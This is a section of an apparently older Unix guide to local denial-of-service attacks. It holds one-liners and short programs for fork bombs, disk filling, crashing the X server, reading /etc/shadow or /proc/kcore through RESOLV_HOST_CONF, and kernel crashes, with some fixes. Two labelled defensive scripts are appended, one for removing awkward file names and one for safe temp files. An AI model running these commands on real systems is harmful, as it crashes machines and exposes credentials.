.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this is executed:

Ex:
    $ ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If the sticky bit is not set on /tmp, the file /tmp/.x11-unix/x0 can be removed and the X-server will crash.

Ex:
    $ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
------------------------------

If your disk space is not limited by a quota, or if you can use /tmp, it's possible for you to fill up the file system.

Ex:
    while : ; do
        mkdir .xxx
        cd .xxx
    done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the C-shell.

Ex:
    % eval '\!\!'

.D.5. MALICIOUS USE OF fork()
-----------------------------

If someone executes this C++ program the result will be a crash on most systems.

Ex:
    #include <sys/types.h>
    #include <unistd.h>
    #include <stdlib.h>     /* system() */

    int main()
    {
        for (int x = 0; x < 1000000; x++) {
            system("uptime");
            fork();
        }
        return 0;
    }

You can use any command you want, but uptime is nice because it shows the workload. To make the attack bigger and uglier you could replace uptime (or fork them both) with sync. This is very bad. If you are really mean you could also fork a child process for every child process, which gives an exponential increase in workload.

There is no good way to stop this attack and similar attacks. A solution could be to place a limit on the execution time and size of processes.

.D.6. CREATING FILES THAT ARE HARD TO REMOVE
--------------------------------------------

Well, all files can be removed, but here are some ideas:

Ex.I.
    $ cat > -xxx
    ^C
    $ ls
    -xxx
    $ rm -xxx
    rm: illegal option -- x
    rm: illegal option -- x
    rm: illegal option -- x
    usage: rm [-fiRr] file ...
    $

Ex.II.
    $ touch xxx!
    $ rm xxx!
    rm: remove xxx! (yes/no)? y
    $ touch xxxxxxxxx!
    $ rm xxxxxxxxx!
    bash: !": event not found
    $

(You see, the size does count!)

Other well known methods are files with odd characters or spaces in the name. These methods could be used in combination with ".D.3 FILLING UP THE HARD DISK". If you want to remove these files you must use some sort of script or a graphical interface like OpenWindows' File Manager. You can also try to use: rm ./<filename>. It should work for the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUP CACHE
---------------------------------

The directory name lookup cache (DNLC) is used whenever a file is opened. DNLC associates the name of the file with a vnode. But DNLC can only operate on files with names that have fewer than N characters (for SunOS 4.x up to 14 characters, for Solaris 2.x up to 30 characters). This means that it's dead easy to launch a pretty discreet denial of service attack. Create, let's say, 20 directories (for a start) and put 10 empty files in every directory. Let every name have over 30 characters and execute a script that runs a lot of ls -al on the directories. If the impact is not big enough you should create more files or launch more processes.

.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification) and the load level will get very high (that is, 100% of the CPU time) in a very short time.

Ex:
    |I /bin/csh
    nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs create files in /tmp but are unable to deal with the problem if the file already exists. In some cases this could be used for a denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the RESOLV_HOST_CONF variable. That is, we can put things in it and through ping access confidential data like /etc/shadow or crash the system. Most systems will crash if /proc/kcore is read via the variable and accessed through ping.

Ex:
    $ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------

Thanks to Mr David Honig <honig@amada.net> for the following:

"Put the string "a&" in a file called "a" and perform "chmod +x a". Running "a" will quickly disable a Sun 4.x machine, even disallowing (counter to specs) root login as the kernel process table fills."

"The cute thing is the size of the script, and how few keystrokes it takes to bring down a Sun as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------

ulimit is used to set a limit on the system resources available to the shell. If ulimit 0 is called before /etc/passwd is written, under DG/UX, the passwd file will be set to zero length.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX, meaning that any user can reset all ICMP, IP and TCP kernel parameters, for example the following:

- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq

The solution could be to set the proper permission on /usr/contrib/bin/nettune:

    # chmod u-s /usr/contrib/bin/nettune

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk quota, the process will go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user can cause a system reload on all FreeBSD versions 2.X before 1996-05-18.

    $ mkdir a
    $ mkdir b
    $ mount_union ~/a ~/b
    $ mount_union -b ~/a ~/b

The solution could be to set the proper permission on /sbin/mount_union:

    # chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause a kernel panic or a window underflow watchdog reset under SunOS 4.1.x, sun4c architecture.
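Going back to .D.6 (and the clean-up it implies after .D.3): the script below is an added example, not part of the original document, showing how an administrator removes files whose names start with "-", end with "!" or contain spaces. It creates its own constructed sample files in a scratch directory and assumes only POSIX sh, mktemp and ls.

```shell
#!/bin/sh
# Added example, not from the original document: removing files whose names
# start with "-", end with "!" or contain spaces (the cases from .D.6).
# Everything happens in a constructed scratch directory, so it is safe to run.

# Create the constructed sample files that trip up a naive "rm <name>".
make_awkward_files() {
    dir=$1
    mkdir -p "$dir"
    : > "$dir/-xxx"               # leading dash: rm parses it as an option
    : > "$dir/-rf"                # leading dash that looks like a dangerous option
    : > "$dir/xxxxxxxxx!"         # trailing "!": history expansion in an interactive shell
    : > "$dir/name with spaces"   # unquoted, this becomes three arguments
}

# Remove every entry in the directory without letting a name be parsed as an
# option: "--" ends option processing and the quoted "$f" keeps spaces intact.
# Doing this from inside the directory is exactly the situation where a bare
# "rm -xxx" fails; "rm ./-xxx" would also work, as the text notes.
remove_awkward_files() {
    ( cd "$1" || exit 1
      for f in * .[!.]* ..?*; do
          [ -e "./$f" ] || continue   # skip glob patterns that matched nothing
          rm -- "$f"
      done )
}

# Number of entries left in the directory (dotfiles included).
count_entries() {
    ls -A "$1" | wc -l | tr -d ' '
}

# Demonstration run on a scratch directory
scratch=$(mktemp -d)
make_awkward_files "$scratch"
echo "before: $(count_entries "$scratch") entries"
remove_awkward_files "$scratch"
echo "after:  $(count_entries "$scratch") entries"
rmdir "$scratch"
```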
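For .D.9, the following is an added example (not from the original document) of the fragile pattern next to two fixes: a program that writes a predictably named file in /tmp, the same write refused under noclobber when the name already exists, and mktemp creating an unpredictable name atomically. The scratch directory, the pre-planted file and the "prog" name are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original document: how a script can create its
# file in /tmp without being derailed by a file that already exists there
# (the failure mode .D.9 describes). Uses a constructed scratch directory
# instead of the real /tmp.

# The fragile pattern: a predictable name and a plain ">" that silently
# truncates whatever is already there (or writes through a planted symlink).
unsafe_tmpfile() {
    name="$1/prog.$$"
    echo "work" > "$name" && echo "$name"
}

# Fix 1: keep the predictable name but refuse to continue if it exists.
# "set -C" (noclobber) makes ">" fail instead of truncating an existing file.
noclobber_tmpfile() {
    name="$1/prog.$$"
    ( set -C; echo "work" > "$name" ) 2>/dev/null || return 1
    echo "$name"
}

# Fix 2: let mktemp pick an unpredictable name and create it atomically with
# mode 0600, so a pre-planted file cannot collide with it at all.
random_tmpfile() {
    mktemp "$1/prog.XXXXXX"
}

# Demonstration: the predictable name is pre-planted (constructed) before the
# program runs, which is the situation the text warns about.
scratch=$(mktemp -d)
: > "$scratch/prog.$$"
unsafe_tmpfile "$scratch" >/dev/null && echo "unsafe:    overwrote the planted file"
noclobber_tmpfile "$scratch" >/dev/null || echo "noclobber: refused, file already exists"
echo "mktemp:    created $(random_tmpfile "$scratch")"
rm -rf "$scratch"
```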